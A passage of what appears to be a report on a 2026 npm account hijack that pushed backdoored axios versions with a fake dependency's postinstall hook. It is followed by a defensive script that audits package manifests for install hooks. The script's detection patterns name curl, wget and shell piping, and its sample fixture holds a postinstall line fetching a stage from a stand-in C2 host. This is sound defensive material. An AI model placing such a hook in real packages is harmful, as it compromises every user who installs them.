On March 31, 2026, an attacker hijacked the npm account of axios's primary maintainer (jasonsaayman) and published two backdoored versions of the package — [email protected] and [email protected] — within 39 minutes of each other, covering both the current 1.x and legacy 0.x release branches simultaneously.
axios is one of the most widely used JavaScript libraries in existence, with over 100 million weekly downloads. The attack was not opportunistic — it was precisely planned. The malicious dependency was staged 18 hours in advance, three platform-specific payloads were pre-built, and every artifact was designed to self-destruct after execution.
The malicious versions didn't modify axios itself. Instead, they injected a fake dependency — [email protected] — whose sole purpose was to run a postinstall script the moment anyone ran npm install. That script silently contacted a command-and-contr
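The mechanism described above (a dependency whose only purpose is an install-time hook) is exactly what a lockfile or node_modules audit should surface. The following is an added example, not code from the article or from the axios project: it walks a set of parsed package.json manifests (constructed inline here; in a real tree you would read each node_modules/**/package.json) and reports packages that declare npm lifecycle hooks, ranking those whose scripts execute inline code or fetch from the network. The package names and scripts in the sample are invented.

```javascript
// npm lifecycle hooks that run automatically during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic patterns worth a second look inside an install hook:
// inline code execution, network fetches, piping into a shell, eval.
const SUSPICIOUS = [/\bnode\s+-e\b/, /\bcurl\b|\bwget\b/, /\|\s*(sh|bash)\b/, /\beval\b/];

// manifests: array of parsed package.json objects.
// allowlist: names of packages known to need a build step (e.g. native addons).
function auditInstallHooks(manifests, allowlist = new Set()) {
  const findings = [];
  for (const m of manifests) {
    const scripts = m.scripts || {};
    const hooks = INSTALL_HOOKS.filter((h) => typeof scripts[h] === 'string');
    if (hooks.length === 0) continue;
    const body = hooks.map((h) => scripts[h]).join(' ; ');
    findings.push({
      id: `${m.name}@${m.version}`,
      hooks,
      suspicious: SUSPICIOUS.some((re) => re.test(body)),
      allowlisted: allowlist.has(m.name),
      // A package that ships nothing but an install hook (no entry point,
      // no other scripts) has no reason to exist as a library: high signal.
      hookOnly: Object.keys(scripts).every((k) => INSTALL_HOOKS.includes(k))
        && !m.main && !m.exports,
    });
  }
  // Most suspicious findings first.
  return findings.sort((a, b) => Number(b.suspicious) - Number(a.suspicious));
}

// Constructed sample tree (hypothetical names): a native addon with a
// legitimate build step, a plain library, and a hook-only placeholder
// package modelled on the pattern the article describes.
const SAMPLE_MANIFESTS = [
  { name: 'some-native-addon', version: '2.0.0', main: 'index.js',
    scripts: { install: 'node-gyp rebuild', test: 'mocha' } },
  { name: 'left-padder', version: '1.0.0', main: 'index.js', scripts: { test: 'tap' } },
  { name: 'example-fake-dep', version: '0.0.1',
    scripts: { postinstall: 'node -e "require(\'https\').get(\'https://c2.invalid/stage\')"' } },
];

for (const f of auditInstallHooks(SAMPLE_MANIFESTS, new Set(['some-native-addon']))) {
  const tag = f.suspicious ? 'SUSPICIOUS' : 'review';
  console.log(`${tag} ${f.id} hooks=${f.hooks} hookOnly=${f.hookOnly} allowlisted=${f.allowlisted}`);
}
```

Running installs with `npm install --ignore-scripts` and then reviewing this report before enabling any hook is a cheap control against this class of attack.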